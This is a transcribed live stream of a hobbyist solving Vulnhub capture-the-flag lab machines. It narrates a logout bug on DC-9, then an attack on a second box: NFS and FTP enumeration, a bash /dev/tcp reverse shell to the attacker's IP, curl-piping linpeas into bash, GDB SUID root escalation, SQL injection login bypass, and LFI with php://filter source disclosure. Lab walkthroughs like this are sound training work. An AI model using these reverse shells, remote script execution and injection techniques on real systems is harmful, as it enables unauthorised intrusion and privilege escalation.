session, it includes config, which is just the database stuff. Oh. Right here. So it's creating the session and setting that here. I don't know why that didn't execute on the other things, but I think this line is what's actually setting it. Let's clear this. And we'll get a new cookie and go there. So delete. Yeah. So now it's not doing that. So we delete this. Go to intercept. Welcome. Send it. And this PHP session is still going to be blank, probably. So cat sess that, and it's still blank. So these lines are setting it, but I'm not exactly positive why. Oh, because manage.php is not including session.php. So the only thing that probably includes session.php is the welcome. So we have solved it. Session.php on everything. Let's do to dev null. So these are the files that include session.php. So if we found add record.php, it would also create it. And back.search.php includes it. Log out. Oh my God. Log out logs you in. Oh, there's no way that happens. This could be one of the funnier bugs. We go to slash. Let's delete this. So I'm on manage. I'm not logged in. We can grab this hash value. Do the correct clipboard to paste. I'm blank. I'm going to go to logout.php. So this is when I reverted the machine earlier because I kept clicking log out and it did nothing. But apparently log out logs you in. The name of this box was DC-9 from Vulnhub. Let's go here, /logout.php. And yep, we're now logged in. So I cat this session and we are logged in. So that is what threw me off earlier in this video when I was doing that. Okay, so now that we solved that problem, let's move on to another box. Before I do that, I want to go look at my live dashboard and see users. We have, I think, 472 watching. That is actually pretty high. That's much higher than I ever expected for my first live stream. So, whoops, closed out Burp Suite. So let's go and check out another box. I'm going to do Mask Crafter because that is at the top. So I'm going to guess this IP is going to be 131 because it's just going to increment by 1. What are my plans? I don't really plan on doing it that much, honestly. I don't plan on doing that many live streams. I had a really busy week and just decided to do this after riding the bike before going to bed. I normally don't do that much pen testing for a living. Okay. Interface ETH1. Let's make sure I'm on the right network. I am not. Change this to host only. And we will reboot the machine. I'm just using Kali. I'm in the security field, but I don't do pen testing. So now we have the box up at 131. So this is going to be Mask Crafter from Vulnhub. So let's take a look at this box. My Burp suite is on, so let's turn it off. And the page is that. So let's start off with doing a, let's start a new tmux. Whoops. The whole reason I want to start a new tmux was to easily get a new home directory. So let's start off with the nmap. So nmap-se, nmap mask crafter, like that. And we're going to sleep for 5 minutes and do a full port scan. So -p -, 192.168.48.131. Let's see. So it looks like we'll have a lot of ports open. Or not that many, actually. So we have FTP with anonymous login, SSH, HTTP, and RPC with NFS. So what do you guys want to look at? We can look at anything first. Do you want to go for FTP, HTTP, or NFS? Before I say anything, let's just do show mount -e 192.168.130. Is it 38 or 48? So yeah, there is an open share. Man, we got a lot. NFS. So what I did right here is a -e, and -e is going to be export table. So we can see we can potentially mount audit results on this box. This star is who can mount it. If we did a -a, that's going to show who has this box mounted. So if this was like a live server and you were in like an NFS home server, you do show mount -a on that server and see all the boxes that have that NFS server mounted. And then if you uploaded SSH keys to them, you could potentially go on the boxes that have it mounted. But no one has it mounted right now, so that's not a thing. So let's do mount -t NFS 192.168.48.131 /audit result /mount. Access denied. So doesn't look like we can mount it. Vers equals 2, protocol not supported. So it only supports NFS version 3, which requires username and password. I don't know of anything that would be for live classes YAML. But, so NFS is a dead end. We can do FTP. So FTP 192.168.48.131. Not 148, 48. And anonymous had worked, so we can do dir. We have a pub directory, notes, creds.zip, and RCE. So what I'm going to do, make dir FTP, go in here, and I think I do wget -r, FTP :// anonymous at 192.168.48.131. And we just download everything. So if we cat rce.php, this is the reverse shell script from Pentest Monkey. So if we check this root directory, rce.php, we don't have anything. Before I go through looking at anything else, let's just run a Go Buster, because we didn't do that last box and it really bit us. So let's do Go Buster -w user share word list, and then we'll do dirbuster directory list 23 medium -u for URL 192.168.48.131 -x php -o go buster -root .out. And we have to put it in dir mode. So while that goes, we can look at the other stuff. So we got notes. If we look at it, dear webmaster, please choose a stronger password for the /debug web directory. Having username admin with is already guessable, but selecting a dictionary password is a big no-no. So let's see. Go to debug, admin, just try admin, and we can log in. So let's see. Click that. Burp suite. Proxy. Let's clear a cache. Run this. Get debug. I actually want to click ifconfig. We set repeater, and we can see it's running the output of ifconfig. So we can probably change this to be any command we want. So looking at this, it does ifconfig ID and uname. Let's try changing it to who am I, because that's not on this box. And output is www-data. So we could also do like lsla and get all the files on this box. So let's see. Bash-i, let's do a reverse shell, dev tcp 192.168.48.129, port 9000, and then what is it? Like that, maybe? If that doesn't work, we'll just do reverse shell cheat sheet. Click send. Didn't work. Let's try bash -c and close that. And we get a reverse shell. So what's happening there is that dev TCP IP port is a bash thing. So I did bash-i and did this, if the shell that executes this is not bash, if it's like dash, which is another shell, then when it goes to resolve this, it won't be able to. So when I put the bash-c before that, now when it executes this command, bash is able to resolve this piece. So that's what just happened there. So let's do Python -c import pty, pty.spawn, then sh, then stty raw minus echo. There's more money in blue teaming than red teaming. LGL. So on this box now, let's do the Linpeas. So copy, privilege escalation here. And now we can do wget echo test. Can we write here? We can't. Dev-shm. Do we have curl? We do. Curl 192.168.48 129 8000 linpeas.sh Python 3 HEP server, and we can pipe this over to bash and go over see what we see. These videos will probably be just on YouTube itself. So once this finishes, we'll look over the results. Oh God. I can write SUID files? What? I don't think I've ever seen that one. Man, there is a lot on this box. So I think someone did like a chmod 777 or something there. I'm going to have to check that out. So running process on the box. Tons running as root. We got FTP as well. MySQL. We go in the database and see if there's any passwords in it. We got a htpasswd file. So that's definitely interesting. Let's do masscrafter. Permit root logins allowed. Cloud config file. That's weird. Let's see. So let's look at var gems. What are these permissions that it's doing this? And GDB. Let's see. Another password. So we got quite a bit, but since it highlighted GDB in that red and yellow, I'm just going to go to GTFO bins. And I'm probably going to have to update my IP again. Type GDB. We can do shell. Used to break out restricted environments. Let's see. Runs a set UID. It may be exploitable. Try running it this way. So what we're using is GDB to execute a Python script to give us a shell. ID, and we are root. So, oh wait, no. I ran that on my box. The number of times I've actually done that is ridiculous. So, let's do this again. Copy, paste, ID. Effective UID is root, so we are still root. Oh, that is good. Let's see. Let's see what else is on this box. So in var.html, there's a lot of files here. We just skipped and went to debug because we saw that on the FTP server, but I don't know why there's all these other files. So let's play with this real quick before I call it a stream. So let's just go to slash, try admin here. Wrong username and password. We can try admin and then the good old or 1 equals 1 trick. Try SQL injection. That works. So let's see. What do they expect us to do here? Development in progress. Please report any bugs to admin@covid19.localhost. So I'm going to get out of this so I don't get spoiled, because this looks like a second path in the box. It's either a path or a dead rabbit hole. So it would be worthwhile to know like when I consider something a rabbit hole and stop looking at it. We already ran a GoBuster, so we should have this output. So we can look at GoBuster root and see the files. We have phpMyAdmin, so that can be a way to pop this box. Let's try admin, admin password, admin secret. So could be something here. We already know what debug is. So login, db.php, JavaScript, logout, warning, functions. Let's take a look at what warning is. Because normally db.php doesn't really print anything because it just stores some config files and exits. So let's go to warning. And nothing there. Let's look at functions. Nothing. looking at the source of this, we see $page is equal to warning. So this looks like a LFI. So if I do page is equal to index.php, it's probably going to hang because we're going to include it indefinitely. Or it does nothing. Nothing is also fine. Let's try etc passwd, and we can get this output. If we want to look at the source code of the page, we can do the PHP filter probably. So php://filter/convert.base64-encode. Resource is equal to warning.php. We got some base64 output, and we can make dir src base64-d echo-n warning.php. Let's do all the files. Index. And I guess we should look at functions. And of course, the DB configuration. So this was functions. What got me in HTTP? Someone was doing the holiday box and had a unique filter. They asked me a question, and it was how you encode IPs different ways. And when I saw a box actually had that trick, I decided to look into it more. So let's see. This is functions. Let's get db.php, or did I already do that? Doesn't look like I did it. Vulnhub doesn't have a difficulty rating or anything that I could find. So we got a MySQL, localhost, web, and password web. So we can probably log into phpMyAdmin now. With web and password web. Okay. So we could poke around at all the tables. So let's see. My database. Creds. Zip password. Oh, we forgot all about the zip. That was in the FTP. catcred.txt. And we get user X. This is my password for user X 2020. So we maybe we'll just SSH. SSH user X at 192.168.48.131. And that's a different way on the box it looks like. And seeing the PEDA is probably a hint that it's going to be GDB related. Let's see, is there anything else we missed? Login, admin user. Oh, why is NFS here? I honestly have no idea. Maybe we can privs. No. I don't know. Show mount -e 192.168.48.131 audit results. So I'm guessing it's NFS version 3. And there's something you can do with this binary. Let's see. String compare. Yeah, this is exploiting this binary because this is a set UID that is doing something. Let's see if we can exploit this real quick with the path thing. It's getting late for me, so I don't want to do this whole exploit. But if it's quick, we can do it. So what is the command? strace. Sweet, we have strace on this box. So we can try strace /mask. Does it ever call system? Right, fstat. Nope, it's not. So it's not vulnerable to path thing. Am I on mute? Hopefully not. If I am, well, you won't hear me say bye because that's why I'm ending the stream. So, hope you guys enjoyed it. Take care, and I'll release a video for Hack the Box next week. And yeah, take care. Thank you for the donation, Optrix.